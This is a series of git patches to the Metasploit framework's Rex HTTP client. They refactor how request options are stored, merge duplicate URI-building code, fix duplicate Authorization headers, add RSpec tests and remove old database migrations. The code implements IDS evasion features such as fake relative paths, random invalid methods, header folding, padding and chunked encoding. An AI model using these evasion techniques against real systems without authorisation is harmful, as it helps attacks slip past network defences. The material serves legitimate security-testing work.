'version' => '1.1', + # # Evasion options # @@ -45,6 +64,7 @@ class ClientRequest 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool 'chunked_size' => 0, # integer + # # NTLM Options # @@ -61,68 +81,25 @@ class ClientRequest 'DigestAuthIIS' => true } - attr_accessor :authorization - attr_accessor :cgi - attr_accessor :config - attr_accessor :connection - attr_accessor :content_type - attr_accessor :cookie - attr_accessor :data - attr_accessor :headers - attr_accessor :host - attr_accessor :method - attr_accessor :path - attr_accessor :port - attr_accessor :protocol - attr_accessor :query - attr_accessor :raw_headers - attr_accessor :ssl - attr_accessor :uri - attr_accessor :user_agent - attr_accessor :vars_get - attr_accessor :vars_post - attr_accessor :version - attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = DefaultConfig.merge(opts['client_config'] || {}) - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] || "" - @headers = opts['headers'] || {} - @host = opts['vhost'] - @method = opts['method'] || "GET" - @path = opts['path_info'] - @port = opts['port'] || 80 - @protocol = opts['proto'] || "HTTP" - @query = opts['query'] || "" - @ssl = opts['ssl'] - @raw_headers = opts['raw_headers'] || "" - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] || {} - @vars_post = opts['vars_post'] || {} - @version = opts['version'] || "1.1" - @opts = opts - + @opts = DefaultConfig.merge(opts) end def to_s # Start GET query string - qstr = query.dup + qstr = opts['query'] ? opts['query'].dup : "" # Start POST data string - pstr = data.dup + pstr = opts['data'] ? opts['data'].dup : "" - if cgi + if opts['cgi'] uri_str= set_cgi - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| + if (opts['pad_get_params']) + 1.upto(opts['pad_get_params_count'].to_i) do |i| qstr << '&' if qstr.length > 0 qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) qstr << '=' @@ -130,33 +107,33 @@ class ClientRequest end end - vars_get.each_pair do |var,val| + opts['vars_get'].each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (config['encode_params'] ? set_encode_uri(var) : var) + qstr << (opts['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (config['encode_params'] ? set_encode_uri(val) : val) + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) end - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| + if (opts['pad_post_params']) + 1.upto(opts['pad_post_params_count'].to_i) do |i| rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) + pstr << (opts['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) + pstr << (opts['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end - vars_post.each_pair do |var,val| + opts['vars_post'].each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(var) : var) + pstr << (opts['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(val) : val) + pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if config['encode'] + if opts['encode'] qstr = set_encode_uri(qstr) end end @@ -166,7 +143,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if config['encode'] + if opts['encode'] req << set_encode_uri(uri_str) else req << uri_str @@ -185,7 +162,7 @@ class ClientRequest req << set_host_header # If an explicit User-Agent header is set, then use that instead of the value of user_agent - unless headers.keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end @@ -197,19 +174,19 @@ class ClientRequest req << set_content_type_header req << set_content_len_header(pstr.length) req << set_chunked_header() - req << raw_headers + req << opts['raw_headers'] req << set_body(pstr) end protected def set_uri - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -222,10 +199,10 @@ class ClientRequest uri_str = buf end - if (config['uri_full_url']) - url = self.ssl ? "https://" : "http://" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") + if (opts['uri_full_url']) + url = opts['ssl'] ? "https://" : "http://" + url << opts['vhost'] + url << ((opts['port'] == 80) ? "" : ":#{opts['port']}") url << uri_str url else @@ -234,12 +211,12 @@ class ClientRequest end def set_cgi - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -254,10 +231,10 @@ class ClientRequest url = uri_str - if (config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? "" : ":#{self.port}" + if (opts['uri_full_url']) + url = opts['ssl'] ? "https" : "http" + url << opts['vhost'] + url << (opts['port'] == 80) ? "" : ":#{opts['port']}" url << uri_str end @@ -266,24 +243,24 @@ class ClientRequest def set_encode_uri(str) a = str.dup - config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + opts['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, opts['uri_encode_mode']) } return a end def set_method - ret = method.dup + ret = opts['method'].dup - if (config['method_random_valid']) + if (opts['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] end - if (config['method_random_invalid']) + if (opts['method_random_invalid']) ret = Rex::Text.rand_text_alpha(rand(20)+1) end - if (config['method_random_case']) + if (opts['method_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -291,11 +268,11 @@ class ClientRequest end def set_method_uri_spacer - len = config['pad_method_uri_count'].to_i + len = opts['pad_method_uri_count'].to_i set = " " buf = "" - case config['pad_method_uri_type'] + case opts['pad_method_uri_type'] when 'tab' set = "\t" when 'apache' @@ -315,11 +292,11 @@ class ClientRequest def set_uri_prepend prefix = "" - if (config['uri_fake_params_start']) + if (opts['uri_fake_params_start']) prefix << '/%3fa=b/../' end - if (config['uri_fake_end']) + if (opts['uri_fake_end']) prefix << '/%20HTTP/1.0/../../' end @@ -331,7 +308,7 @@ class ClientRequest # TODO: # * Encode path information def set_path_info - path ? path : '' + opts['path_info'] ? opts['path_info'] : '' end # @@ -347,11 +324,11 @@ class ClientRequest # Return the spacing between the uri and the version # def set_uri_version_spacer - len = config['pad_uri_version_count'].to_i + len = opts['pad_uri_version_count'].to_i set = " " buf = "" - case config['pad_uri_version_type'] + case opts['pad_uri_version_type'] when 'tab' set = "\t" when 'apache' @@ -369,17 +346,17 @@ class ClientRequest # Return the HTTP version string # def set_version - ret = protocol + "/" + version + ret = opts['proto'] + "/" + opts['version'] - if (config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + if (opts['version_random_valid']) + ret = opts['proto'] + "/" + ['1.0', '1.1'][rand(2)] end - if (config['version_random_invalid']) + if (opts['version_random_invalid']) ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) end - if (config['version_random_case']) + if (opts['version_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -390,7 +367,7 @@ class ClientRequest # Return a formatted header string # def set_formatted_header(var, val) - if (self.config['header_folding']) + if (self.opts['header_folding']) "#{var}:\r\n\t#{val}\r\n" else "#{var}: #{val}\r\n" @@ -401,38 +378,38 @@ class ClientRequest # Return the HTTP agent header # def set_agent_header - user_agent ? set_formatted_header("User-Agent", user_agent) : "" + opts['agent'] ? set_formatted_header("User-Agent", opts['agent']) : "" end def set_auth_header - authorization ? set_formatted_header("Authorization", authorization) : "" + opts['authorization'] ? set_formatted_header("Authorization", opts['authorization']) : "" end # # Return the HTTP cookie header # def set_cookie_header - cookie ? set_formatted_header("Cookie", cookie) : "" + opts['cookie'] ? set_formatted_header("Cookie", opts['cookie']) : "" end # # Return the HTTP connection header # def set_connection_header - connection ? set_formatted_header("Connection", connection) : "" + opts['connection'] ? set_formatted_header("Connection", opts['connection']) : "" end # # Return the content type header # def set_content_type_header - set_formatted_header("Content-Type", content_type) + opts['ctype'] ? set_formatted_header("Content-Type", opts['ctype']) : "" end # # Return the content length header def set_content_len_header(clen) - return "" if config['chunked_size'] > 0 + return "" if opts['chunked_size'] > 0 set_formatted_header("Content-Length", clen) end @@ -440,8 +417,8 @@ class ClientRequest # Return the HTTP Host header # def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] + return "" if opts['uri_full_url'] + host ||= opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) @@ -449,8 +426,8 @@ class ClientRequest end # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" + if not [80,443].include?(opts['port']) + host = host + ":#{opts['port']}" end set_formatted_header("Host", host) @@ -462,8 +439,8 @@ class ClientRequest def set_extra_headers buf = '' - if (config['pad_fake_headers']) - 1.upto(config['pad_fake_headers_count'].to_i) do |i| + if (opts['pad_fake_headers']) + 1.upto(opts['pad_fake_headers_count'].to_i) do |i| buf << set_formatted_header( Rex::Text.rand_text_alphanumeric(rand(32)+1), Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -471,7 +448,7 @@ class ClientRequest end end - headers.each_pair do |var,val| + opts['headers'].each_pair do |var,val| buf << set_formatted_header(var, val) end @@ -479,7 +456,7 @@ class ClientRequest end def set_chunked_header - return "" if config['chunked_size'] == 0 + return "" if opts['chunked_size'] == 0 set_formatted_header('Transfer-Encoding', 'chunked') end @@ -487,11 +464,11 @@ class ClientRequest # Return the HTTP seperator and body string # def set_body(bdata) - return "\r\n" + bdata if config['chunked_size'] == 0 + return "\r\n" + bdata if opts['chunked_size'] == 0 str = bdata.dup chunked = '' while str.size > 0 - chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunk = str.slice!(0,rand(opts['chunked_size']) + 1) chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" end "\r\n" + chunked + "0\r\n\r\n" diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 154a1a9485..29db9873bf 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -4,7 +4,7 @@ require 'rex/proto/http/client_request' shared_context "with 'uri_dir_self_reference'" do before(:all) do - client_request.config['uri_dir_self_reference'] = true + client_request.opts['uri_dir_self_reference'] = true end it "should return the unmodified uri" do @@ -14,9 +14,9 @@ end shared_context "with no evasions" do before(:all) do - client_request.config['uri_dir_self_reference'] = false - client_request.config['uri_fake_params_start'] = false - client_request.config['uri_full_url'] = false + client_request.opts['uri_dir_self_reference'] = false + client_request.opts['uri_fake_params_start'] = false + client_request.opts['uri_full_url'] = false end it "should return the unmodified uri" do @@ -27,11 +27,11 @@ end shared_context "with 'uri_full_url'" do before(:all) do - client_request.config['uri_full_url'] = true + client_request.opts['uri_full_url'] = true end before(:each) do - client_request.config['vhost'] = host + client_request.opts['vhost'] = host end context "with ipv4 host" do @@ -43,7 +43,7 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do - # client_request.config['vhost'] = "[#{host}]" + # client_request.opts['vhost'] = "[#{host}]" #end it_behaves_like "uri_full_url" @@ -83,9 +83,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - # Yes, vhost is in the config. There is no godly reason why this - # should be so. - 'client_config' => { 'vhost' => 'www.example.com', }, + 'vhost' => 'www.example.com', }), { :set_cgi => { :result => "/" }, @@ -106,7 +104,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - 'client_config' => { 'header_folding' => true, } + 'header_folding' => true, }), { :set_uri => { :result => "/" }, @@ -124,7 +122,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host", default_options.merge({ - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, @@ -134,7 +132,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host and non-default port", default_options.merge({ 'port' => 1234, - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, @@ -162,11 +160,9 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'client_config' => { - 'uri_encode_mode' => encode_mode, - 'encode_params' => encode_params, - 'encode' => false, - }, + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 8dc10b8c46..11177b90fe 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -56,8 +56,6 @@ describe Rex::Proto::Http::Client do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest - req.port.should == 80 - req.ssl.should be_false end it "should attempt to connect to a server" do From b0745b090ac4698d54097f383f5ea7486c6f2ba8 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:54:31 -0600 Subject: [PATCH 48/87] Msf HTTP uses this directly, can't axe it --- lib/rex/proto/http/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index b10af20c3c..be7b6cb436 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,6 +23,7 @@ module Http ### class Client + DefaultUserAgent = ClientRequest::DefaultUserAgent # # Creates a new client instance From 16bba7a6aca24d1dd28cddab66595d81d753f98d Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 18:06:55 -0600 Subject: [PATCH 49/87] Add test for pad_get_params --- .../lib/rex/proto/http/client_request_spec.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 29db9873bf..26729dfa52 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -178,6 +178,22 @@ describe Rex::Proto::Http::ClientRequest do } end + context "with 'pad_get_params'" do + let(:encode_params) { true } + it "should ..." do + old = client_request.opts['pad_get_params'] + client_request.opts['pad_get_params'] = true + + client_request.opts['pad_get_params_count'] = 0 + client_request.to_s.split("&").length.should == vars_get.length + + client_request.opts['pad_get_params_count'] = 10 + client_request.to_s.split("&").length.should == vars_get.length + 10 + + client_request.opts['pad_get_params'] = old + end + end + context "without 'encode_params'" do let(:encode_params) { false } it "should contain the unaltered params" do @@ -190,7 +206,7 @@ describe Rex::Proto::Http::ClientRequest do context "with 'encode_params'" do let(:encode_params) { true } - context "with 'uri_encode_mode' = default (hex-normal)" do + context "and 'uri_encode_mode' = default (hex-normal)" do it "should encode special chars" do str = client_request.to_s str.should include("foo%5b%5d=bar") @@ -199,7 +215,7 @@ describe Rex::Proto::Http::ClientRequest do end end - context "with 'uri_encode_mode' = hex-all" do + context "and 'uri_encode_mode' = hex-all" do let(:encode_mode) { 'hex-all' } it "should encode all chars" do str = client_request.to_s From 425c245771f68e69b5b90ac5e6b984d10f9bfc58 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 19:13:05 -0600 Subject: [PATCH 50/87] Axe set_cgi in favor of set_uri They were identical except for a couple of extra bugs in set_cgi. Also changes ```split("/")``` to ```split("/", -1)```, which behaves correctly when the input has a seperator at the beginning or end. --- lib/rex/proto/http/client_request.rb | 38 ++---------------- .../lib/rex/proto/http/client_request_spec.rb | 40 ++++++++++++------- 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 31933fe5f7..62e1ede0e8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -32,6 +32,7 @@ class ClientRequest 'vars_get' => {}, 'vars_post' => {}, 'version' => '1.1', + 'vhost' => nil, # # Evasion options @@ -96,7 +97,7 @@ class ClientRequest pstr = opts['data'] ? opts['data'].dup : "" if opts['cgi'] - uri_str= set_cgi + uri_str = set_uri if (opts['pad_get_params']) 1.upto(opts['pad_get_params_count'].to_i) do |i| @@ -132,10 +133,10 @@ class ClientRequest pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else - uri_str = set_uri if opts['encode'] qstr = set_encode_uri(qstr) end + uri_str = set_uri end req = '' @@ -188,7 +189,7 @@ class ClientRequest if (opts['uri_dir_fake_relative']) buf = "" - uri_str.split('/').each do |part| + uri_str.split('/',-1).each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -210,37 +211,6 @@ class ClientRequest end end - def set_cgi - uri_str = opts['uri'].dup - if (opts['uri_dir_self_reference']) - uri_str.gsub!('/', '/./') - end - - if (opts['uri_dir_fake_relative']) - buf = "" - uri_str.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri_str = buf - end - - url = uri_str - - if (opts['uri_full_url']) - url = opts['ssl'] ? "https" : "http" - url << opts['vhost'] - url << (opts['port'] == 80) ? "" : ":#{opts['port']}" - url << uri_str - end - - url - end - def set_encode_uri(str) a = str.dup opts['uri_encode_count'].times { diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 26729dfa52..426721cb6c 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -2,15 +2,6 @@ require 'spec_helper' require 'rex/proto/http/client_request' -shared_context "with 'uri_dir_self_reference'" do - before(:all) do - client_request.opts['uri_dir_self_reference'] = true - end - - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end -end shared_context "with no evasions" do before(:all) do @@ -24,6 +15,30 @@ shared_context "with no evasions" do end end + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.opts['uri_dir_self_reference'] = true + end + + it "should have a self reference" do + client_request.send(:set_uri).should == "/./" + end +end + + +shared_context "with 'uri_dir_fake_relative'" do + before(:all) do + client_request.opts['uri_dir_fake_relative'] = true + end + + it "should contain sequences of '../'" do + client_request.send(:set_uri).should include("../") + end + +end + + shared_context "with 'uri_full_url'" do before(:all) do @@ -42,9 +57,6 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } - #before(:each) do - # client_request.opts['vhost'] = "[#{host}]" - #end it_behaves_like "uri_full_url" end @@ -59,7 +71,7 @@ end shared_examples "uri_full_url" do - it "should have the host in the URI" do + it "#set_uri should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end @@ -86,7 +98,6 @@ describe Rex::Proto::Http::ClientRequest do 'vhost' => 'www.example.com', }), { - :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -238,6 +249,7 @@ describe Rex::Proto::Http::ClientRequest do describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with 'uri_dir_fake_relative'" it_behaves_like "with no evasions" end From 5a79fcd11e516c17abaa4ef9a7fce956b31d7518 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Feb 2013 13:47:30 -0600 Subject: [PATCH 51/87] Ensure we build only one Authorization header Also fixes an issue where Host headers were generated with nil by preferring the vhost from Client instead of the default nil from ClientRequest. --- lib/rex/proto/http/client.rb | 58 +++++++------------ lib/rex/proto/http/client_request.rb | 18 +++++- .../lib/rex/proto/http/client_request_spec.rb | 4 +- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++ 4 files changed, 89 insertions(+), 40 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index be7b6cb436..38b5c3ac2b 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -38,11 +38,13 @@ class Client self.username = username self.password = password - self.config = { + # Take ClientRequest's defaults, but override with our own + self.config = Http::ClientRequest::DefaultConfig.merge({ 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - }.merge(Http::ClientRequest::DefaultConfig) + }) + # XXX: This info should all be controlled by ClientRequest self.config_types = { 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], 'uri_encode_count' => 'integer', @@ -104,7 +106,6 @@ class Client self.config[var]=val end - end # @@ -145,12 +146,6 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' - opts['client_config'] = self.config - - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end @@ -167,28 +162,26 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} + opts['agent'] ||= config['agent'] + opts['basic_auth'] ||= config['basic_auth'] || '' + opts['cookie'] ||= config['cookie'] + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['data'] ||= '' + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] ||= config['raw_headers'] || '' + opts['uri'] ||= '/' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] ||= config['version'] || '1.1' + opts['vhost'] ||= config['vhost'] opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - - opts['client_config'] = self.config if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -196,10 +189,6 @@ class Client opts['encode_params'] = false end - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end @@ -321,11 +310,8 @@ class Client return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' - if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) - else - opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} - end + opts['headers'] ||= {} + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) req = request_cgi(opts) res = _send_recv(req,t,persist) return res diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 62e1ede0e8..039d11559d 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -86,6 +86,12 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + + # Backwards compatibility for wonky basic authentication api from + # the dawn of time. + if opts['basic_auth'] and not opts['authorization'] + @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" + end end def to_s @@ -162,12 +168,18 @@ class ClientRequest req << set_version req << set_host_header - # If an explicit User-Agent header is set, then use that instead of the value of user_agent + # If an explicit User-Agent header is set, then use that instead of + # the default unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end - req << set_auth_header + # Similar to user-agent, only add an automatic auth header if a + # manual one hasn't been provided + unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + req << set_auth_header + end + req << set_cookie_header req << set_connection_header req << set_extra_headers @@ -388,7 +400,7 @@ class ClientRequest # def set_host_header return "" if opts['uri_full_url'] - host ||= opts['vhost'] + host = opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 426721cb6c..3bf44fcaa4 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -22,7 +22,8 @@ shared_context "with 'uri_dir_self_reference'" do end it "should have a self reference" do - client_request.send(:set_uri).should == "/./" + client_request.send(:set_uri).should include("/./") + client_request.to_s.should include("/./") end end @@ -34,6 +35,7 @@ shared_context "with 'uri_dir_fake_relative'" do it "should contain sequences of '../'" do client_request.send(:set_uri).should include("../") + client_request.to_s.should include("../") end end diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 11177b90fe..bb2f642e38 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -55,6 +55,55 @@ describe Rex::Proto::Http::Client do it "should produce a CGI HTTP request" do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest + end + + context "with authorization" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli.set_config({"authorization" => "Basic base64dstuffhere"}) + cli + end + let(:user) { "user" } + let(:pass) { "pass" } + let(:base64) { ["user:pass"].pack('m').chomp } + + context "and an Authorization header" do + before do + cli.set_config({"headers" => { "Authorization" => "Basic #{base64}" } }) + end + it "should have one Authorization header" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer the value in the header" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end + + context "and basic_auth" do + before do + cli.set_config({"basic_auth" => "user:pass"}) + end + it "should not have two Authorization headers" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer basic_auth" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end end From 239e1934b8bc8d84b6daa1cbcef29b98aba41575 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 09:03:45 -0600 Subject: [PATCH 52/87] Use migrations from metasploit_data_models [#44034071] metasploit_data_models version 0.5.0 copied the migrations from metasploit-framework/data/sql/migrate to metasploit_data_models/db/migrate so that specs could be written the Mdm models in metasploit_data_models. As part of the specs, :null => false columns that should be :null => true were discovered, so a new migration was added, but to metasploit_data_models/db/migrate, so it could be tested. Instead of replicating migrations back and forth, I'm removing the migrations completely from metasploit-framework and changing the default migration path in Msf::DbManager#migration_paths to MetasploitDataModels.root.join('db', 'migrate'). --- Gemfile | 2 +- Gemfile.lock | 14 +- data/sql/migrate/000_create_tables.rb | 79 --------- data/sql/migrate/001_add_wmap_tables.rb | 35 ---- data/sql/migrate/002_add_workspaces.rb | 36 ---- data/sql/migrate/003_move_notes.rb | 20 --- data/sql/migrate/004_add_events_table.rb | 16 -- data/sql/migrate/005_expand_info.rb | 58 ------- data/sql/migrate/006_add_timestamps.rb | 26 --- data/sql/migrate/007_add_loots.rb | 20 --- data/sql/migrate/008_create_users.rb | 16 -- data/sql/migrate/009_add_loots_ctype.rb | 10 -- data/sql/migrate/010_add_alert_fields.rb | 16 -- data/sql/migrate/011_add_reports.rb | 19 --- data/sql/migrate/012_add_tasks.rb | 24 --- data/sql/migrate/013_add_tasks_result.rb | 10 -- data/sql/migrate/014_add_loots_fields.rb | 12 -- data/sql/migrate/015_rename_user.rb | 16 -- data/sql/migrate/016_add_host_purpose.rb | 10 -- data/sql/migrate/017_expand_info2.rb | 58 ------- .../migrate/018_add_workspace_user_info.rb | 29 ---- data/sql/migrate/019_add_workspace_desc.rb | 23 --- data/sql/migrate/020_add_user_preferences.rb | 11 -- .../migrate/021_standardize_info_and_data.rb | 18 -- data/sql/migrate/022_enlarge_event_info.rb | 10 -- .../migrate/023_add_report_downloaded_at.rb | 10 -- .../024_convert_service_info_to_text.rb | 12 -- data/sql/migrate/025_add_user_admin.rb | 19 --- data/sql/migrate/026_add_creds_table.rb | 19 --- .../20100819123300_migrate_cred_data.rb | 154 ------------------ .../20100824151500_add_exploited_table.rb | 16 -- .../20100908001428_add_owner_to_workspaces.rb | 9 - .../20100911122000_add_report_templates.rb | 18 -- .../20100916151530_require_admin_flag.rb | 15 -- ...00916175000_add_campaigns_and_templates.rb | 61 ------- 